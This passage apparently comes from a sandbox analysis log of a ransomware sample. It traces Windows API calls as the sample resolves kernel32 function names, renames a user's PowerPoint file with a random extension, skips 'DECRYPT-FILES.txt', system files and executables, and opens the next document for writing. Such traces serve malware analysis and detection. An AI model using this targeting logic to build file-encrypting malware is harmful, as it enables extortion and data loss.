lpString2="CreateHardLinkA" | out: lpString1="CreateHardLinkA") returned="CreateHardLinkA" [0083.889] lstrlenA (lpString="CREATEHARDLINKA") returned 15 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedA" | out: lpString1="CreateHardLinkTransactedA") returned="CreateHardLinkTransactedA" [0083.889] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDA") returned 25 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkTransactedW" | out: lpString1="CreateHardLinkTransactedW") returned="CreateHardLinkTransactedW" [0083.889] lstrlenA (lpString="CREATEHARDLINKTRANSACTEDW") returned 25 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateHardLinkW" | out: lpString1="CreateHardLinkW") returned="CreateHardLinkW" [0083.889] lstrlenA (lpString="CREATEHARDLINKW") returned 15 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateIoCompletionPort" | out: lpString1="CreateIoCompletionPort") returned="CreateIoCompletionPort" [0083.889] lstrlenA (lpString="CREATEIOCOMPLETIONPORT") returned 22 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectA" | out: lpString1="CreateJobObjectA") returned="CreateJobObjectA" [0083.889] lstrlenA (lpString="CREATEJOBOBJECTA") returned 16 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobObjectW" | out: lpString1="CreateJobObjectW") returned="CreateJobObjectW" [0083.889] lstrlenA (lpString="CREATEJOBOBJECTW") returned 16 [0083.889] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateJobSet" | out: lpString1="CreateJobSet") returned="CreateJobSet" [0083.889] lstrlenA (lpString="CREATEJOBSET") returned 12 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotA" | out: lpString1="CreateMailslotA") returned="CreateMailslotA" [0083.890] lstrlenA (lpString="CREATEMAILSLOTA") returned 15 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMailslotW" | out: lpString1="CreateMailslotW") returned="CreateMailslotW" [0083.890] lstrlenA (lpString="CREATEMAILSLOTW") returned 15 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMemoryResourceNotification" | out: lpString1="CreateMemoryResourceNotification") returned="CreateMemoryResourceNotification" [0083.890] lstrlenA (lpString="CREATEMEMORYRESOURCENOTIFICATION") returned 32 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexA" | out: lpString1="CreateMutexA") returned="CreateMutexA" [0083.890] lstrlenA (lpString="CREATEMUTEXA") returned 12 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExA" | out: lpString1="CreateMutexExA") returned="CreateMutexExA" [0083.890] lstrlenA (lpString="CREATEMUTEXEXA") returned 14 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexExW" | out: lpString1="CreateMutexExW") returned="CreateMutexExW" [0083.890] lstrlenA (lpString="CREATEMUTEXEXW") returned 14 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateMutexW" | out: lpString1="CreateMutexW") returned="CreateMutexW" [0083.890] lstrlenA (lpString="CREATEMUTEXW") returned 12 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeA" | out: lpString1="CreateNamedPipeA") returned="CreateNamedPipeA" [0083.890] lstrlenA (lpString="CREATENAMEDPIPEA") returned 16 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateNamedPipeW" | out: lpString1="CreateNamedPipeW") returned="CreateNamedPipeW" [0083.890] lstrlenA (lpString="CREATENAMEDPIPEW") returned 16 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePipe" | out: lpString1="CreatePipe") returned="CreatePipe" [0083.890] lstrlenA (lpString="CREATEPIPE") returned 10 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceA" | out: lpString1="CreatePrivateNamespaceA") returned="CreatePrivateNamespaceA" [0083.890] lstrlenA (lpString="CREATEPRIVATENAMESPACEA") returned 23 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreatePrivateNamespaceW" | out: lpString1="CreatePrivateNamespaceW") returned="CreatePrivateNamespaceW" [0083.890] lstrlenA (lpString="CREATEPRIVATENAMESPACEW") returned 23 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessA" | out: lpString1="CreateProcessA") returned="CreateProcessA" [0083.890] lstrlenA (lpString="CREATEPROCESSA") returned 14 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessAsUserW" | out: lpString1="CreateProcessAsUserW") returned="CreateProcessAsUserW" [0083.890] lstrlenA (lpString="CREATEPROCESSASUSERW") returned 20 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalA" | out: lpString1="CreateProcessInternalA") returned="CreateProcessInternalA" [0083.890] lstrlenA (lpString="CREATEPROCESSINTERNALA") returned 22 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessInternalW" | out: lpString1="CreateProcessInternalW") returned="CreateProcessInternalW" [0083.890] lstrlenA (lpString="CREATEPROCESSINTERNALW") returned 22 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateProcessW" | out: lpString1="CreateProcessW") returned="CreateProcessW" [0083.890] lstrlenA (lpString="CREATEPROCESSW") returned 14 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThread" | out: lpString1="CreateRemoteThread") returned="CreateRemoteThread" [0083.890] lstrlenA (lpString="CREATEREMOTETHREAD") returned 18 [0083.890] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateRemoteThreadEx" | out: lpString1="CreateRemoteThreadEx") returned="CreateRemoteThreadEx" [0083.891] lstrlenA (lpString="CREATEREMOTETHREADEX") returned 20 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreA" | out: lpString1="CreateSemaphoreA") returned="CreateSemaphoreA" [0083.891] lstrlenA (lpString="CREATESEMAPHOREA") returned 16 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExA" | out: lpString1="CreateSemaphoreExA") returned="CreateSemaphoreExA" [0083.891] lstrlenA (lpString="CREATESEMAPHOREEXA") returned 18 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreExW" | out: lpString1="CreateSemaphoreExW") returned="CreateSemaphoreExW" [0083.891] lstrlenA (lpString="CREATESEMAPHOREEXW") returned 18 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSemaphoreW" | out: lpString1="CreateSemaphoreW") returned="CreateSemaphoreW" [0083.891] lstrlenA (lpString="CREATESEMAPHOREW") returned 16 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSocketHandle" | out: lpString1="CreateSocketHandle") returned="CreateSocketHandle" [0083.891] lstrlenA (lpString="CREATESOCKETHANDLE") returned 18 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkA" | out: lpString1="CreateSymbolicLinkA") returned="CreateSymbolicLinkA" [0083.891] lstrlenA (lpString="CREATESYMBOLICLINKA") returned 19 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedA" | out: lpString1="CreateSymbolicLinkTransactedA") returned="CreateSymbolicLinkTransactedA" [0083.891] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDA") returned 29 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkTransactedW" | out: lpString1="CreateSymbolicLinkTransactedW") returned="CreateSymbolicLinkTransactedW" [0083.891] lstrlenA (lpString="CREATESYMBOLICLINKTRANSACTEDW") returned 29 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateSymbolicLinkW" | out: lpString1="CreateSymbolicLinkW") returned="CreateSymbolicLinkW" [0083.891] lstrlenA (lpString="CREATESYMBOLICLINKW") returned 19 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTapePartition" | out: lpString1="CreateTapePartition") returned="CreateTapePartition" [0083.891] lstrlenA (lpString="CREATETAPEPARTITION") returned 19 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThread" | out: lpString1="CreateThread") returned="CreateThread" [0083.891] lstrlenA (lpString="CREATETHREAD") returned 12 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpool" | out: lpString1="CreateThreadpool") returned="CreateThreadpool" [0083.891] lstrlenA (lpString="CREATETHREADPOOL") returned 16 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolCleanupGroup" | out: lpString1="CreateThreadpoolCleanupGroup") returned="CreateThreadpoolCleanupGroup" [0083.891] lstrlenA (lpString="CREATETHREADPOOLCLEANUPGROUP") returned 28 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolIo" | out: lpString1="CreateThreadpoolIo") returned="CreateThreadpoolIo" [0083.891] lstrlenA (lpString="CREATETHREADPOOLIO") returned 18 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolTimer" | out: lpString1="CreateThreadpoolTimer") returned="CreateThreadpoolTimer" [0083.891] lstrlenA (lpString="CREATETHREADPOOLTIMER") returned 21 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWait" | out: lpString1="CreateThreadpoolWait") returned="CreateThreadpoolWait" [0083.891] lstrlenA (lpString="CREATETHREADPOOLWAIT") returned 20 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateThreadpoolWork" | out: lpString1="CreateThreadpoolWork") returned="CreateThreadpoolWork" [0083.891] lstrlenA (lpString="CREATETHREADPOOLWORK") returned 20 [0083.891] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueue" | out: lpString1="CreateTimerQueue") returned="CreateTimerQueue" [0083.891] lstrlenA (lpString="CREATETIMERQUEUE") returned 16 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateTimerQueueTimer" | out: lpString1="CreateTimerQueueTimer") returned="CreateTimerQueueTimer" [0083.892] lstrlenA (lpString="CREATETIMERQUEUETIMER") returned 21 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateToolhelp32Snapshot" | out: lpString1="CreateToolhelp32Snapshot") returned="CreateToolhelp32Snapshot" [0083.892] lstrlenA (lpString="CREATETOOLHELP32SNAPSHOT") returned 24 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerA" | out: lpString1="CreateWaitableTimerA") returned="CreateWaitableTimerA" [0083.892] lstrlenA (lpString="CREATEWAITABLETIMERA") returned 20 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExA" | out: lpString1="CreateWaitableTimerExA") returned="CreateWaitableTimerExA" [0083.892] lstrlenA (lpString="CREATEWAITABLETIMEREXA") returned 22 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerExW" | out: lpString1="CreateWaitableTimerExW") returned="CreateWaitableTimerExW" [0083.892] lstrlenA (lpString="CREATEWAITABLETIMEREXW") returned 22 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CreateWaitableTimerW" | out: lpString1="CreateWaitableTimerW") returned="CreateWaitableTimerW" [0083.892] lstrlenA (lpString="CREATEWAITABLETIMERW") returned 20 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="CtrlRoutine" | out: lpString1="CtrlRoutine") returned="CtrlRoutine" [0083.892] lstrlenA (lpString="CTRLROUTINE") returned 11 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeactivateActCtx" | out: lpString1="DeactivateActCtx") returned="DeactivateActCtx" [0083.892] lstrlenA (lpString="DEACTIVATEACTCTX") returned 16 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcess" | out: lpString1="DebugActiveProcess") returned="DebugActiveProcess" [0083.892] lstrlenA (lpString="DEBUGACTIVEPROCESS") returned 18 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugActiveProcessStop" | out: lpString1="DebugActiveProcessStop") returned="DebugActiveProcessStop" [0083.892] lstrlenA (lpString="DEBUGACTIVEPROCESSSTOP") returned 22 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreak" | out: lpString1="DebugBreak") returned="DebugBreak" [0083.892] lstrlenA (lpString="DEBUGBREAK") returned 10 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugBreakProcess" | out: lpString1="DebugBreakProcess") returned="DebugBreakProcess" [0083.892] lstrlenA (lpString="DEBUGBREAKPROCESS") returned 17 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DebugSetProcessKillOnExit" | out: lpString1="DebugSetProcessKillOnExit") returned="DebugSetProcessKillOnExit" [0083.892] lstrlenA (lpString="DEBUGSETPROCESSKILLONEXIT") returned 25 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodePointer" | out: lpString1="DecodePointer") returned="DecodePointer" [0083.892] lstrlenA (lpString="DECODEPOINTER") returned 13 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DecodeSystemPointer" | out: lpString1="DecodeSystemPointer") returned="DecodeSystemPointer" [0083.892] lstrlenA (lpString="DECODESYSTEMPOINTER") returned 19 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceA" | out: lpString1="DefineDosDeviceA") returned="DefineDosDeviceA" [0083.892] lstrlenA (lpString="DEFINEDOSDEVICEA") returned 16 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DefineDosDeviceW" | out: lpString1="DefineDosDeviceW") returned="DefineDosDeviceW" [0083.892] lstrlenA (lpString="DEFINEDOSDEVICEW") returned 16 [0083.892] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DelayLoadFailureHook" | out: lpString1="DelayLoadFailureHook") returned="DelayLoadFailureHook" [0083.892] lstrlenA (lpString="DELAYLOADFAILUREHOOK") returned 20 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteAtom" | out: lpString1="DeleteAtom") returned="DeleteAtom" [0083.893] lstrlenA (lpString="DELETEATOM") returned 10 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteBoundaryDescriptor" | out: lpString1="DeleteBoundaryDescriptor") returned="DeleteBoundaryDescriptor" [0083.893] lstrlenA (lpString="DELETEBOUNDARYDESCRIPTOR") returned 24 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteCriticalSection" | out: lpString1="DeleteCriticalSection") returned="DeleteCriticalSection" [0083.893] lstrlenA (lpString="DELETECRITICALSECTION") returned 21 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFiber" | out: lpString1="DeleteFiber") returned="DeleteFiber" [0083.893] lstrlenA (lpString="DELETEFIBER") returned 11 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileA" | out: lpString1="DeleteFileA") returned="DeleteFileA" [0083.893] lstrlenA (lpString="DELETEFILEA") returned 11 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedA" | out: lpString1="DeleteFileTransactedA") returned="DeleteFileTransactedA" [0083.893] lstrlenA (lpString="DELETEFILETRANSACTEDA") returned 21 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileTransactedW" | out: lpString1="DeleteFileTransactedW") returned="DeleteFileTransactedW" [0083.893] lstrlenA (lpString="DELETEFILETRANSACTEDW") returned 21 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteFileW" | out: lpString1="DeleteFileW") returned="DeleteFileW" [0083.893] lstrlenA (lpString="DELETEFILEW") returned 11 [0083.893] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteProcThreadAttributeList" | out: lpString1="DeleteProcThreadAttributeList") returned="DeleteProcThreadAttributeList" [0083.893] lstrlenA (lpString="DELETEPROCTHREADATTRIBUTELIST") returned 29 [0083.897] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueue" | out: lpString1="DeleteTimerQueue") returned="DeleteTimerQueue" [0083.897] lstrlenA (lpString="DELETETIMERQUEUE") returned 16 [0083.899] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueEx" | out: lpString1="DeleteTimerQueueEx") returned="DeleteTimerQueueEx" [0083.899] lstrlenA (lpString="DELETETIMERQUEUEEX") returned 18 [0083.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteTimerQueueTimer" | out: lpString1="DeleteTimerQueueTimer") returned="DeleteTimerQueueTimer" [0083.901] lstrlenA (lpString="DELETETIMERQUEUETIMER") returned 21 [0083.901] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointA" | out: lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0083.903] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0083.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0083.903] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0083.903] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0083.907] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0083.907] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0083.912] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0083.912] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0083.914] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0083.914] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0083.914] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0083.914] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0083.918] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0083.920] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0083.920] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0083.920] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0083.922] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0083.922] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0083.923] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0083.923] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0083.923] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0083.923] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0083.923] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0083.923] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0083.923] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0083.923] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0083.923] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0083.923] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0083.923] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0083.923] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0083.923] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0083.923] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0083.923] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0083.923] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0083.923] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0083.924] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0083.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0083.924] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0083.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0083.924] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0083.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0083.924] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0083.924] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0083.924] lstrcpyW (in: lpString1=0xfb0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0083.924] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx") returned 68 [0083.924] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx.nZLlU") returned 74 [0083.924] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\i2gfw.pptx"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\i2GfW.pptx.nZLlU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\i2gfw.pptx.nzllu"), dwFlags=0x0) returned 1 [0083.925] VirtualFree (lpAddress=0xfa0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.925] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.925] VirtualFree (lpAddress=0xf90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0083.926] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x28f16700, ftCreationTime.dwHighDateTime=0x1d4c9c0, ftLastAccessTime.dwLowDateTime=0x85f33e70, ftLastAccessTime.dwHighDateTime=0x1d4cca8, ftLastWriteTime.dwLowDateTime=0x85f33e70, ftLastWriteTime.dwHighDateTime=0x1d4cca8, nFileSizeHigh=0x0, nFileSizeLow=0x8fc0, dwReserved0=0x0, dwReserved1=0x0, cFileName="ii_H.pptx", cAlternateFileName="II_H~1.PPT")) returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="DECRYPT-FILES.txt") returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="autorun.inf") returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="boot.ini") returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="desktop.ini") returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="ntuser.dat") returned -1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="iconcache.db") returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="bootsect.bak") returned 1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="ntuser.dat.log") returned -1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="thumbs.db") returned -1 [0083.926] lstrcmpiW (lpString1="ii_H.pptx", lpString2="Bootfont.bin") returned 1 [0083.926] lstrlenW (lpString="ii_H.pptx") returned 9 [0083.926] lstrcmpiW (lpString1="pptx", lpString2="lnk") returned 1 [0083.926] lstrcmpiW (lpString1="pptx", lpString2="exe") returned 1 [0083.926] lstrcmpiW (lpString1="pptx", lpString2="sys") returned -1 [0083.926] lstrcmpiW (lpString1="pptx", lpString2="dll") returned 1 [0083.926] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned 58 [0083.926] lstrlenW (lpString="ii_H.pptx") returned 9 [0083.926] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\" [0083.926] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\", lpString2="ii_H.pptx" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx" [0083.926] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xf90000 [0083.926] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\CySgPL_RS7_GjN8uh\\ii_H.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\cysgpl_rs7_gjn8uh\\ii_h.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, 